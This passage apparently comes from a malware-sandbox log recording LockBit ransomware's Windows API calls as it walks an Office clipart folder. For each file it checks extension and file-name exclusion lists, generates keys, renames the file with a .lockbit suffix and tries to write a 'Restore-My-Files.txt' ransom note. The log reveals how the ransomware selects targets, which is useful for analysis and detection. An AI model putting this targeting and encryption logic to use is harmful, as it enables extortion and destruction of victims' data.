0x2f4 [0113.818] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.818] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.818] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17850) returned 1 [0113.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.819] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.825] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.825] malloc (_Size=0xa6) returned 0x77d7a8 [0113.832] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.832] free (_Block=0x77d7a8) [0113.832] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.832] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.832] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.832] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa5bdb00, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaa5bdb00, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x2eda, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00076_.WMF", cAlternateFileName="")) returned 1 [0113.832] lstrcmpiW (lpString1=".", lpString2="FD00076_.WMF") returned -1 [0113.832] lstrcmpiW (lpString1="..", lpString2="FD00076_.WMF") returned -1 [0113.832] PathFindExtensionW (pszPath="FD00076_.WMF") returned=".WMF" [0113.832] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.832] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.832] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.833] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.834] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.834] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00076_.WMF") returned 1 [0113.834] lstrcmpiW (lpString1="ntldr", lpString2="FD00076_.WMF") returned 1 [0113.834] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00076_.WMF") returned 1 [0113.835] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00076_.WMF") returned -1 [0113.835] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00076_.WMF") returned -1 [0113.835] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00076_.WMF") returned 1 [0113.835] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00076_.WMF") returned 1 [0113.835] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.835] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned=".WMF" [0113.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.835] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.835] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.836] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.836] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.lockbit") returned 72 [0113.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.858] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.858] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.858] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11994) returned 1 [0113.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.859] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.862] malloc (_Size=0xa6) returned 0x77d7a8 [0113.862] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.863] free (_Block=0x77d7a8) [0113.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.863] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6bb4600, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb6bb4600, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x7620, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00077_.WMF", cAlternateFileName="")) returned 1 [0113.863] lstrcmpiW (lpString1=".", lpString2="FD00077_.WMF") returned -1 [0113.863] lstrcmpiW (lpString1="..", lpString2="FD00077_.WMF") returned -1 [0113.863] PathFindExtensionW (pszPath="FD00077_.WMF") returned=".WMF" [0113.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.863] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.864] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.864] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00077_.WMF") returned 1 [0113.865] lstrcmpiW (lpString1="ntldr", lpString2="FD00077_.WMF") returned 1 [0113.865] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00077_.WMF") returned 1 [0113.865] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00077_.WMF") returned -1 [0113.865] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00077_.WMF") returned -1 [0113.865] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00077_.WMF") returned 1 [0113.865] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00077_.WMF") returned 1 [0113.865] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.865] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned=".WMF" [0113.865] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.865] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.865] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.866] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.866] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.lockbit") returned 72 [0113.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0113.870] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.870] malloc (_Size=0x40068) returned 0x3e70008 [0113.870] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=30240) returned 1 [0113.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.871] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0113.873] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.873] malloc (_Size=0xa6) returned 0x77d7a8 [0113.873] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.874] free (_Block=0x77d7a8) [0113.874] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.874] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.874] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb58a1900, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb58a1900, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x721c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00086_.WMF", cAlternateFileName="")) returned 1 [0113.874] lstrcmpiW (lpString1=".", lpString2="FD00086_.WMF") returned -1 [0113.874] lstrcmpiW (lpString1="..", lpString2="FD00086_.WMF") returned -1 [0113.874] PathFindExtensionW (pszPath="FD00086_.WMF") returned=".WMF" [0113.874] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.874] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.874] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.874] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.874] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.874] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.875] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.875] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".ini", lpString2=".WMF") 